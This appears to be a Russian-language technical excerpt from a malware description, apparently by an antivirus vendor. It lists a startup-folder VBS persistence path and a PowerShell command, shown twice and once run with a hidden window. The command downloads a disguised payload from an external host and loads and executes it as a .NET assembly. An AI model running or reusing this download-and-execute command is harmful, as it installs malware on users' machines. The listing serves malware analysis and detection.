Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $file='C:\Users\Public\Music\a.jpg';Invoke-WebRequest -Uri 'https://amistalabs.org/wp-admin/images/Marry.png' -OutFile $file;[System.Reflection.Assembly]::loadfile($file);[axx.bxx]::cxx()' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $file='C:\Users\Public\Music\a.jpg';Invoke-WebRequest -Uri 'https://amistalabs.org/wp-admin/images/Marry.png' -OutFile $file;[System.Reflection.Assembly]::loadfile($file);[axx.bxx]::cxx()